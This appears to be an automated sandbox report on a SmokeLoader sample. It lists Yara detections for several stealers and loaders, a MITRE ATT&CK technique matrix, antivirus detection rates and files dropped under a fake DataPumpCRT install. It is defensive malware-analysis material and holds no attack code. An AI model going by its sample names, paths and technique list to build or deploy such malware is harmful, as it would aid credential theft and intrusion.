Source: Yara match	File source: 00000023.00000002.2865187814.0000000003443000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2775428464.0000000002B14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2775428464.0000000002A34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3074464547.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nsa984B.tmp.exe PID: 7684, type: MEMORYSTR

Remote Access Functionality

Yara detected Glupteba

Source: Yara match	File source: 15.3.31839b57a4f11171d6abc8bbc4451ee4.exe.3780000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.2e90e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 31839b57a4f11171d6abc8bbc4451ee4.exe PID: 7216, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: 00000020.00000002.2626410097.0000000000D43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 9E77.exe PID: 4048, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3260, type: MEMORYSTR
Source: Yara match	File source: 30.3.9E77.exe.25a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000003.2170961305.00000000025A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Petite Virus

Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-PFHT1.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-S6TO1.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-N2733.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-458PU.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-L31R1.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-HBK1Q.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-FH8NJ.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-RFBIV.tmp, type: DROPPED

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000021.00000002.2254271275.000000001BB01000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2579639062.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2749142755.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2733384950.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2685718453.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2598657111.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2671933578.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2589623228.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2601421528.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2579353533.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2766322903.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2524246310.00000162B3841000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2735752153.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2599342972.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2754627663.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2674739926.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2711828784.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2675907860.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2578924547.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2637787202.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2575495914.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2705435281.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2573590064.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2604182414.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2703030103.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2675453290.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2600355817.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2675138321.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2564289331.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2642967465.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2734180264.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2689183677.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2686086613.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2633965317.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2669460233.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2564740508.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2738413729.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2593035447.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2672383899.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2578573733.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2606999840.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2635361488.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2605648094.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2739604145.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2637330287.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2739194931.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2685151300.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2638553734.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2602553062.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2644099258.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2627137075.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2605031090.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2577695503.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2673068563.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2594779782.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2731190444.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2722127729.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2644959111.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2608660423.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2726975550.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2206636387.00000162B0C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2562339585.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2598333639.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2607875870.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2632610681.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2700525376.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2730383751.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2563346057.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2576231333.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2712495323.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2712931577.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2736607710.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2643465060.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2744176853.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 4.2.4854.exe.4acd9b0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.4854.exe.43f07f0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.4854.exe.4acd9b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.33A6.exe.790000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.4854.exe.43f07f0.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1911380987.0000000004ACA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.2368989273.0000000000792000.00000002.00000001.01000000.00000023.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3067317156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2865187814.0000000003443000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1911380987.0000000004BBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2775428464.0000000002A34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1911380987.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7932, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\33A6.exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: uVQLD8YVk6.exe, type: SAMPLE
Source: Yara match	File source: 0.2.uVQLD8YVk6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.toolspub2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.srvwauv.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.toolspub2.exe.5c15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.uVQLD8YVk6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.srvwauv.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1918764869.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2145002254.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1676508085.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2145323149.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1676415097.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1919452397.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\srvwauv, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 31.2.nsa984B.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.nsa984B.tmp.exe.8b0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.nsa984B.tmp.exe.9b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.nsa984B.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.3077167175.0000000002435000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3068398850.0000000000400000.00000040.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.2202387362.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3071615615.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nsa984B.tmp.exe PID: 7684, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: nsa984B.tmp.exe PID: 7684, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 35.2.CFAA.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.4854.exe.aa0000.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\AppData\Local\Temp\4854.exe

Code function: 4_2_6CE3A0C0 CorBindToRuntimeEx,GetModuleHandleW,GetModuleHandleW,__cftoe,GetModuleHandleW,GetProcAddress,

4_2_6CE3A0C0

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	241 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	13 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	1 System Shutdown/Reboot	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	14 Native API	221 Registry Run Keys / Startup Folder	1 Abuse Elevation Control Mechanism	111 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	Exfiltration Over Bluetooth	21 Encrypted Channel	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	1 Shared Modules	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Credentials in Registry	14 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	1 Non-Standard Port			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	1 Exploitation for Client Execution	Login Hook	1 Access Token Manipulation	3 Obfuscated Files or Information	NTDS	189 System Information Discovery	Distributed Component Object Model	21 Input Capture	Traffic Duplication	4 Non-Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	2 Command and Scripting Interpreter	Network Logon Script	813 Process Injection	23 Software Packing	LSA Secrets	1 Query Registry	SSH	2 Clipboard Data	Scheduled Transfer	125 Application Layer Protocol			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	1 PowerShell	RC Scripts	221 Registry Run Keys / Startup Folder	1 Timestomp	Cached Domain Credentials	1081 Security Software Discovery	VNC	GUI Input Capture	Data Transfer Size Limits	1 Proxy			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	681 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	Application Layer Protocol			Defacement	Serverless	Network Trust Dependencies
Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	32 Masquerading	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Web Protocols			Internal Defacement	Malvertising	Network Topology
Supply Chain Compromise	PowerShell	Cron	Cron	681 Virtualization/Sandbox Evasion	Network Sniffing	3 System Owner/User Discovery	Shared Webroot	Local Data Staging	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	File Transfer Protocols			External Defacement	Compromise Infrastructure	IP Addresses
Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Access Token Manipulation	Input Capture	1 Remote System Discovery	Software Deployment Tools	Remote Data Staging	Exfiltration Over Unencrypted Non-C2 Protocol	Mail Protocols			Firmware Corruption	Domains	Network Security Appliances
Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	813 Process Injection	Keylogging	11 System Network Configuration Discovery	Taint Shared Content	Screen Capture	Exfiltration Over Physical Medium	DNS			Resource Hijacking	DNS Server	Gather Victim Org Information
Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Hidden Files and Directories	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Exfiltration over USB	Proxy			Network Denial of Service	Virtual Private Server	Determine Physical Locations

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
uVQLD8YVk6.exe	81%	ReversingLabs	Win32.Trojan.SmokeLoader
uVQLD8YVk6.exe	86%	Virustotal		Browse
uVQLD8YVk6.exe	100%	Avira	TR/Crypt.XPACK.Gen
uVQLD8YVk6.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Program Files (x86)\ClocX\ClocX.exe	5%	ReversingLabs
C:\Program Files (x86)\ClocX\uninst.exe	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\7z.exe (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\OptimFROG.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bass.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_aac.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_fx.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_ofr.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_tta.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bassalac.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bassape.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\basscd.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bassdsd.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bassflac.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bassmidi.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bassmix.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\bassopus.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\basswma.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\basswv.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\d_writer.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\da.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\daiso.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\dsd2.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\dsd2pcmt.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\dstt.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\ff_helper.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\gain_analysis.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-02A0E.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-058DS.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-0KP4B.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-2OL25.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-2P3N7.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-458PU.tmp	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-4LAMA.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-61EBL.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-646RI.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-83LM2.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-8B32G.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-8EMRV.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-8V27N.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-9QGCC.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-AEA87.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-DC7RD.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-DKM5H.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-DS3J7.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-E8AR2.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-EH959.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-EHRNN.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-FD1T9.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-FH8NJ.tmp	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-G5GT1.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-HBK1Q.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-JVPL3.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-L31R1.tmp	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-L9N3D.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-MHVNS.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-N08BV.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-N2733.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-OJELM.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-PFHT1.tmp	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-PK4J3.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-QBH3J.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-R8UBV.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-RFBIV.tmp	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-S6TO1.tmp	3%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-SA8KK.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-T2EVG.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-T6JUK.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TLO0A.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TU4E5.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-UJ6TD.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-UMGQV.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\lame_enc.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\libFLAC_dynamic.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\libdtsdec.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\libmp4v2.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\libsox-3.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\libsoxr.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\libvorbis.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\libwebp.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\libwinpthread-1.dll (copy)	0%	ReversingLabs
